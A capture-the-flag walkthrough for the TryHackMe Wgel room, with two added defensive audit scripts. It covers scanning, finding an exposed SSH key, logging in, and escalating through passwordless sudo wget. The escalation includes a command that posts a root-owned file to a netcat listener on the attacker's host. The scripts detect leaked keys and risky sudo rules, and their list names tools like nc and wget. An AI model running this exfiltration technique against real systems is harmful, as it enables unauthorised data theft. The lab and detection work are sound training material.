Written by Çağrı Ali Ceylan.
[EN] TryHackMe Wgel CTF Writeup
Hello everyone, in this article we will be solving the room named Wgel CTF in TryHackMe.
Let’s Start!
First we perform an aggressive nmap scan. nmap is an information-gathering tool that we can use to actively collect information about the network.
nmap -A 10.10.213.167
We have 2 open ports: port 80 and port 22. A website is running on port 80, and the SSH service is running on port 22. We will start with the website, since it is open to everyone, and use the tool named gobuster to search for directories.
gobuster dir -u http://10.10.213.167/ -w common.txt
We found one directory, sitemap. There is not much to see in it directly, so we run a second directory scan inside the sitemap directory.
gobuster dir -u http://10.10.213.167/sitemap -w common.txt
And yes! We found an SSH key.
With the key we can log in, but we still need a username. When we look at the source code of the site, we see a comment like this:
<!-- Jessie don’t forget to udate the webiste -->
Based on this text, we understand that the user’s name is “Jessie”, so we will now connect over SSH. Before connecting, we need to restrict the permissions on the id_rsa file, because ssh refuses to use a private key file that other users can read. We can set them as follows.
chmod 600 id_rsa
Let’s connect over SSH now.
ssh -i id_rsa [email protected]
And yes we are in!
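Seen from the defender's side, both leaks used above (a private key reachable under the web root and a developer comment naming a user) can be caught before a site goes live. The script below is an added example, not part of the original write-up; the directory layout, the key placeholder and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a web document root for the two leaks in this write-up.
# The sample tree below is constructed; function names are hypothetical.

# List files under $1 that contain a PEM private-key header
# (RSA, EC, OPENSSH, ENCRYPTED or plain PKCS#8). Hidden directories are included.
find_exposed_keys() {
    grep -rlIE -e '-----BEGIN ([A-Z]+ )?PRIVATE KEY-----' "$1" 2>/dev/null | sort
}

# Print file:line:comment for single-line HTML comments in page sources,
# so they can be reviewed for names, paths or credentials before publishing.
find_html_comments() {
    grep -rnoE --include='*.html' --include='*.htm' --include='*.php' \
        -e '<!--.*-->' "$1" 2>/dev/null | sort
}

# Build a constructed document root that mirrors the findings above.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/sitemap/backup"
    cat > "$d/index.html" <<'EOF'
<html><body>
<!-- Jessie don't forget to udate the webiste -->
</body></html>
EOF
    # Placeholder only: header and footer lines without any key material.
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' '(constructed placeholder)' \
        '-----END RSA PRIVATE KEY-----' > "$d/sitemap/backup/id_rsa"
    printf 'body { color: black; }\n' > "$d/sitemap/style.css"
    printf '%s\n' "$d"
}

root=$(make_sample_root)
echo "Private keys under the web root:"
find_exposed_keys "$root"
echo "HTML comments to review:"
find_html_comments "$root"
rm -rf "$root"
```

Pointed at a real document root, any path printed by find_exposed_keys is a key that should be moved out of the served tree and rotated.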
When we search the directories inside, we see that the user flag is in the Documents directory. We can use the cat or less tools to read the flag. Let’s look at the flag.
cd Documents
cat user_flag.txt
less user_flag.txt (alternative)
Now we need to escalate our privileges, so we first check which commands we are allowed to run with administrator privileges. We can use the following command.
sudo -l
When we look at the output of the command, we see that we can run /usr/bin/wget as an administrator without a password, and we can exploit that. A detailed resource on abusing this is here: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/. Now let’s exploit our machine by entering the command given there.
First, we need to start a netcat listener on our own computer.
nc -lvnp 5050
Now let’s enter the following command on the target machine. Replace the IP address with the one TryHackMe assigned to you.
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.9.30.197:5050
Because wget is allowed through sudo without a password, the machine did not ask us for one when we ran it with administrator permission. Now let’s go to the terminal tab where netcat is listening and see whether anything arrived. Yes, it did! The value of our administrator flag is in front of us, so let’s enter the flag and finish the machine.
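The escalation above comes down to a single passwordless sudo rule. As an added example (not part of the original write-up), the script below reads `sudo -l` output and flags passwordless rules for file-transfer binaries; the sample output, the binary list and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag passwordless sudo rules for binaries that can read or
# send arbitrary files. The binary list is illustrative, not exhaustive.
RISKY_BINARIES="wget curl scp rsync nc"

# Read `sudo -l` output on stdin; print each NOPASSWD command that is either
# ALL or one of RISKY_BINARIES (matched on the basename of the command path).
flag_risky_sudo() {
    awk -v risky="$RISKY_BINARIES" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /NOPASSWD:/ {
            sub(/^.*NOPASSWD:[ \t]*/, "")           # keep only the command list
            m = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= m; i++) {
                split(cmds[i], w, " ")              # w[1] = path, rest = arguments
                k = split(w[1], p, "/")
                if (w[1] == "ALL" || (p[k] in bad)) print w[1]
            }
        }'
}

# Constructed sample of `sudo -l` output (user and host names are made up).
sample_sudo_l() {
    cat <<'EOF'
User jessie may run the following commands on target:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
    (root) NOPASSWD: /usr/bin/systemctl status nginx, /usr/bin/curl
EOF
}

sample_sudo_l | flag_risky_sudo
# On a live host: sudo -l | flag_risky_sudo
```

A rule flagged this way should be removed from sudoers, or replaced with a root-owned wrapper script that fixes the arguments the binary is allowed to receive.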
You can follow our website for more content!
https://pwnlab.me/category/walkthrough/